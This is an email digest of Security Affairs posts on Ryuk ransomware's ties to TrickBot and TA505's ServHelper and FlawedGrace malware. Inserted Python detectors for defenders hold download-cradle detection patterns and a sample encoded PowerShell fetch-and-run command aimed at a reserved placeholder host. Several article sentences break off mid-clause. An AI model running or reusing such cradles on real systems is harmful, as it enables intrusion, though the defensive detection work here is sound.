- Which is the link between Ryuk ransomware and TrickBot?
- Security Affairs newsletter Round 196 – News of the week
- TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal
Posted: 13 Jan 2019 09:43 PM PST
FireEye and CrowdStrike discovered that threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks.
In August 2018, security experts from Check Point uncovered a ransomware-based campaign aimed at organizations around the world, which they attributed to a North Korea-linked threat actor. It was the first time a security firm had detected the Ryuk ransomware.
The campaign appeared targeted and well planned: the attackers hit several enterprises and encrypted hundreds of PCs, storage systems and data centers in each infected company.
Some organizations paid an exceptionally large ransom to recover their encrypted files; Check Point confirmed that the ransoms paid by the victims ranged from 15 BTC to 50 BTC.
At least three organizations in the United States and elsewhere were severely affected, and the attackers were estimated to have already netted over $640,000 at that time.
The same ransomware was recently used in an attack that disrupted the distribution of major newspapers, including the Wall Street Journal, the New York Times and the Los Angeles Times.
Further investigation on the malware allowed the experts from security firms FireEye and CrowdStrike to discover that threat actors behind the
Experts at CrowdStrike believe Ryuk is operated by a group they track as GRIM SPIDER, which appears to be a cell of the Russia-based WIZARD SPIDER, the group behind TrickBot.
“GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as "big game hunting," signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell.” reads the report published by
“The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.”
FireEye tracks the same financially motivated activity as TEMP.MixMaster, a label it applies to incidents in which the Ryuk ransomware was deployed following TrickBot infections.
The circumstance suggests that TrickBot operators are adopting the crime-as-a-service model to offer access to systems they have
“It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware.” reads the post published by FireEye.
“The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations,”
FireEye experts observed a malspam campaign, ultimately leading to Ryuk, that used messages pretending to be a Deloitte payroll schedule.
“Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server.” continues FireEye.
“Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign's broad distribution both geographically and across industry verticals.”
Once inside, the attackers used Empire, the PowerShell post-exploitation framework, to distribute payloads across the compromised network.
Empire was used to harvest credentials from other computers in the network and then install the Ryuk ransomware on them.
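The chain described above (a macro in the payroll lure launching a download cradle, then Empire-style encoded PowerShell) leaves a distinctive parent/child process trail. The following is an added detection example, not code from the Security Affairs post, FireEye or CrowdStrike: it flags Office applications spawning a script host, decodes `-EncodedCommand` arguments the way `powershell -enc` expects them (base64 of UTF-16LE), and looks for common download-cradle strings. The process events, hostnames, paths and command lines are constructed for illustration, and `example.invalid` is a reserved name.

```python
"""Flag macro-to-PowerShell process chains in constructed process-creation events.

Added example; not code from the Security Affairs post, FireEye or CrowdStrike.
Events are shaped like Sysmon Event ID 1 records. Hostnames, paths and the
command lines are constructed for illustration (example.invalid is a reserved name).
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Patterns common to Empire launchers and generic PowerShell download cradles.
CRADLE_PATTERNS = [re.compile(p, re.I) for p in (
    r"net\.webclient", r"downloadstring", r"downloadfile",
    r"\biex\b", r"invoke-expression", r"frombase64string")]
# -e / -ec / -en / -enc / -EncodedCommand followed by the base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind an -EncodedCommand argument (UTF-16LE base64), else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent) -> List[str]:
    """Return the detection labels that apply to one event (empty list = nothing flagged)."""
    hits = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    if child in {"powershell.exe", "pwsh.exe"}:
        script = decode_encoded_command(ev.command_line)
        if script is not None:
            hits.append("encoded_powershell")
        text = script if script is not None else ev.command_line
        if any(p.search(text) for p in CRADLE_PATTERNS):
            hits.append("download_cradle")
    return hits


def scan(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per flagged event, in input order."""
    findings = []
    for e in events:
        labels = classify(e)
        if labels:
            findings.append({"host": e.host, "image": _basename(e.image), "labels": labels})
    return findings


# Constructed sample events (not real telemetry). The stage-one cradle is
# base64/UTF-16LE encoded here exactly the way `powershell -enc` expects it.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent("WS-0412", r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\a.user\Downloads\payroll_schedule.doc"'),
    ProcEvent("WS-0412", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -enc {_ENC}"),
    ProcEvent("WS-0412", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Only the second event is flagged: Word spawning PowerShell, an encoded command, and a cradle inside it. The scheduled-task style invocation from svchost.exe is left alone, which is the point of keying on the parent process rather than on `powershell.exe` itself.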
The investigations by FireEye, CrowdStrike and McAfee seem to rule out a link between Ryuk and North Korea; the experts believe the actors behind the ransomware are based in Russia.
According to McAfee, the initial attribution to North Korea may be wrong because it rested solely on code similarities between Ryuk and Hermes. The experts pointed out that in August 2017 the Hermes ransomware was being sold on the Exploit.in forum by a Russian-speaking actor.
Likely, the Lazarus Group bought the ransomware and used it in its operations to complicate attribution.
(SecurityAffairs – hacking, Ryuk ransomware)
The post Which is the link between Ryuk ransomware and TrickBot? appeared first on Security Affairs.
Posted: 13 Jan 2019 07:43 AM PST
A new round of the weekly SecurityAffairs newsletter arrived!
The best news of the week with Security Affairs.
Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal
Once again thank you!
(SecurityAffairs – newsletter)
The post Security Affairs newsletter Round 196 – News of the week appeared first on Security Affairs.
Posted: 13 Jan 2019 06:42 AM PST
Proofpoint analyzed two strains of malware tracked as ServHelper and FlawedGrace distributed through phishing campaigns by the TA505 crime gang.
Security researchers at Proofpoint discovered two strains of malware, tracked as ServHelper and FlawedGrace, distributed through phishing campaigns by the TA505 crime gang.
ServHelper is a backdoor of which the experts analyzed two variants, while FlawedGrace is a remote access trojan (RAT).
“In November 2018, TA505, a prolific actor that has been at the forefront of this trend, began
“Additionally we have observed the downloader variant download a malware we call "FlawedGrace." FlawedGrace is a full-featured RAT that we first observed in November 2017.”
TA505 was first identified by Proofpoint in 2017; it has been active since at least 2015 and targets organizations in the financial and retail industries.
The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including
In November experts observed several campaigns carried out by the
One of the largest campaigns distributed tens of thousands of emails and leveraged
On December 13, Proofpoint observed a third campaign spreading the ServHelper backdoor.
“On December 13, 2018, we observed another large ServHelper "downloader" campaign targeting retail and financial services customers.” reads the analysis published by Proofpoint.
“The messages used a mixture of Microsoft Word attachments with embedded malicious macros, PDF attachments with URLs linking to a fake "Adobe PDF Plugin" webpage linking to the malware, and direct URLs in the email body linking to a ServHelper executable.”
The attacks leveraging the two malware families were not targeted in nature: the attackers aimed broadly at financial services organizations worldwide.
Once downloaded, the ServHelper backdoor sets up reverse SSH tunnels that let the attackers reach the infected system over Remote Desktop Protocol (RDP) on port 3389.
“As noted, there are two distinct variants of ServHelper: a "tunnel" variant and a "downloader" variant. The "tunnel" variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP).”
“Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to "hijack" legitimate user accounts or their web browser profiles and use them as they see fit,”
Experts also discovered a second ServHelper variant that lacks the tunneling and hijacking capabilities; in this case the backdoor is used only as a downloader for the FlawedGrace RAT.
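A reverse SSH tunnel of the kind the "tunnel" variant sets up has a side effect defenders can key on: the attacker's RDP client is relayed to 127.0.0.1:3389 on the victim, so the Windows Security log records a logon event 4624 with LogonType 10 (RemoteInteractive) whose source address is loopback rather than a peer workstation. The following is an added example, not code from the Security Affairs post or Proofpoint; it pulls those logons from constructed Security-log lines and pairs them with outbound connections to TCP/22 from the same host taken from constructed Sysmon-style network events. All hosts, users, addresses and paths are made up.

```python
"""Spot RDP logons that arrive over a local tunnel, as a reverse SSH tunnel produces.

Added example; not code from the Security Affairs post or Proofpoint. Log lines,
hosts, users and addresses are constructed in a simplified key=value form and
are not real Windows or Sysmon exports.
"""
import ipaddress
from typing import Dict, List, Set

RDP_LOGON_TYPE = "10"   # 4624 LogonType 10 = RemoteInteractive (RDP)

# Constructed Security-log lines: one normal RDP logon, two loopback-sourced
# RDP logons, one loopback logon that is not RDP, and one with no address.
SECURITY_LINES = [
    "EventID=4624 Computer=WS-0412 LogonType=10 TargetUser=a.user IpAddress=10.20.1.55",
    "EventID=4624 Computer=WS-0412 LogonType=10 TargetUser=a.user IpAddress=127.0.0.1",
    "EventID=4624 Computer=WS-0412 LogonType=3 TargetUser=svc-backup IpAddress=127.0.0.1",
    "EventID=4624 Computer=FS-01 LogonType=10 TargetUser=admin IpAddress=::1",
    "EventID=4624 Computer=FS-01 LogonType=10 TargetUser=admin IpAddress=-",
]
# Constructed Sysmon-style network-connection events (EventID 3).
NETWORK_LINES = [
    "EventID=3 Computer=WS-0412 Image=C:\\Users\\a.user\\AppData\\Roaming\\svchost.exe DestinationIp=203.0.113.7 DestinationPort=22",
    "EventID=3 Computer=FS-01 Image=C:\\Windows\\System32\\svchost.exe DestinationIp=10.0.0.20 DestinationPort=445",
]


def parse(line: str) -> Dict[str, str]:
    """Parse one constructed key=value event line into a dict."""
    return dict(tok.split("=", 1) for tok in line.split())


def is_loopback(addr: str) -> bool:
    """True for 127.0.0.0/8 and ::1; False for '-' or anything unparsable."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def loopback_rdp_logons(lines: List[str]) -> List[Dict[str, str]]:
    """4624 RemoteInteractive logons whose source address is loopback."""
    hits = []
    for line in lines:
        ev = parse(line)
        if (ev.get("EventID") == "4624" and ev.get("LogonType") == RDP_LOGON_TYPE
                and is_loopback(ev.get("IpAddress", ""))):
            hits.append(ev)
    return hits


def hosts_with_outbound_ssh(lines: List[str]) -> Set[str]:
    """Hosts that opened an outbound connection to TCP/22."""
    return {ev["Computer"] for ev in map(parse, lines)
            if ev.get("EventID") == "3" and ev.get("DestinationPort") == "22"}


def correlate(security_lines: List[str], network_lines: List[str]) -> List[Dict[str, object]]:
    """Attach an outbound-SSH flag to each loopback RDP logon seen on the same host."""
    ssh_hosts = hosts_with_outbound_ssh(network_lines)
    findings = []
    for ev in loopback_rdp_logons(security_lines):
        findings.append({"host": ev["Computer"], "user": ev["TargetUser"],
                         "source": ev["IpAddress"],
                         "outbound_ssh": ev["Computer"] in ssh_hosts})
    return findings


if __name__ == "__main__":
    for f in correlate(SECURITY_LINES, NETWORK_LINES):
        print(f)
```

Two caveats for anyone turning this into a production rule: a loopback-sourced RDP logon is a lead, not proof, since some remote-support and VPN clients also bind locally; and the tunnel's outer connection need not use port 22, so the `outbound_ssh` flag should be read as supporting evidence rather than a requirement.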
The threat actors use the .bit top-level domain (TLD) for their command-and-control (C2) servers. Support for .bit C2 domains was added to protect the infrastructure: the TLD is associated with the Namecoin cryptocurrency and is resolved through special DNS servers that the malware queries (dedsolutions[.]bit, arepos[.]bit).
The .bit TLD is not controlled by ICANN, which means there is no registry to ask to shut down a fraudulent domain used as C2.
TA505 also uses the FlawedGrace RAT. The malware is written in C++ and, according to Proofpoint, its coding style and the techniques it implements suggest that the RAT and ServHelper were developed by different groups.
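Because .bit names do not exist in the ICANN root, a host resolving them has to talk to a non-standard resolver, which gives defenders two things to look for in DNS logs: the TLD itself and the resolver the query went to. The following is an added example, not code from the Security Affairs post or Proofpoint. It scans constructed DNS query lines for alternative-root TLDs (Namecoin's .bit, the Emercoin TLDs and .onion) and for queries sent anywhere other than an approved corporate resolver. The log lines, source hosts and resolver addresses are constructed; the two .bit domains are the ones named above, and the output is defanged.

```python
"""Flag DNS lookups for alternative-root TLDs such as .bit and lookups that bypass corporate resolvers.

Added example; not code from the Security Affairs post or Proofpoint. Log lines,
hosts and resolver addresses are constructed (203.0.113.0/24 is a documentation range).
"""
from typing import Dict, List

# TLDs served outside the ICANN root. The blockchain ones resolve only via
# special resolvers, which is exactly why the malware needs them.
ALT_ROOT_TLDS = {"bit": "Namecoin", "emc": "Emercoin", "coin": "Emercoin",
                 "lib": "Emercoin", "bazar": "Emercoin", "onion": "Tor"}
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}   # constructed corporate resolvers

# Constructed DNS query log lines.
DNS_LINES = [
    "2018-12-13T10:01:02Z src=10.20.1.55 resolver=10.0.0.53 qname=www.example.com qtype=A",
    "2018-12-13T10:01:09Z src=10.20.1.55 resolver=10.0.0.53 qname=dedsolutions.bit qtype=A",
    "2018-12-13T10:01:10Z src=10.20.1.55 resolver=203.0.113.5 qname=arepos.bit qtype=A",
    "2018-12-13T10:01:12Z src=10.20.1.56 resolver=203.0.113.5 qname=update.example.org qtype=A",
]


def parse_line(line: str) -> Dict[str, str]:
    """Parse one constructed log line: timestamp followed by key=value pairs."""
    ts, rest = line.split(" ", 1)
    ev = dict(tok.split("=", 1) for tok in rest.split())
    ev["ts"] = ts
    return ev


def tld_of(qname: str) -> str:
    """Lower-cased last label, tolerating a trailing dot."""
    return qname.rstrip(".").rsplit(".", 1)[-1].lower()


def defang(qname: str) -> str:
    """Render a domain so it is not clickable in reports."""
    return qname.replace(".", "[.]")


def classify_query(ev: Dict[str, str]) -> List[str]:
    """Reasons a single query is suspicious (empty list = nothing flagged)."""
    reasons = []
    tld = tld_of(ev["qname"])
    if tld in ALT_ROOT_TLDS:
        reasons.append(f"alt_root_tld:{ALT_ROOT_TLDS[tld]}")
    if ev["resolver"] not in APPROVED_RESOLVERS:
        reasons.append("non_approved_resolver")
    return reasons


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious query, in log order."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        reasons = classify_query(ev)
        if reasons:
            findings.append({"ts": ev["ts"], "src": ev["src"],
                             "qname": defang(ev["qname"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(DNS_LINES):
        print(f)
```

The second line shows why the TLD check matters on its own: a .bit query to the corporate resolver will simply fail with NXDOMAIN, but the attempt is still logged and still identifies the infected host. The last line shows the inverse, a legitimate name sent to an unknown resolver, which is the egress pattern a .bit-capable client needs and is worth blocking at the perimeter regardless of the name queried.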
“Threat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or like Locky ransomware it may become the dominant strain of malware in the wild. In this case, the group has started distributing two variants on a new backdoor we named ServHelper and a RAT we call FlawedGrace.” concluded Proofpoint.
“This also extends the trend that emerged in 2018, in which threat actors increasingly focused on
(SecurityAffairs – TA505, cybercrime)
The post TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal appeared first on Security Affairs.
You are subscribed to email updates from Security Affairs.
Email delivery powered by Google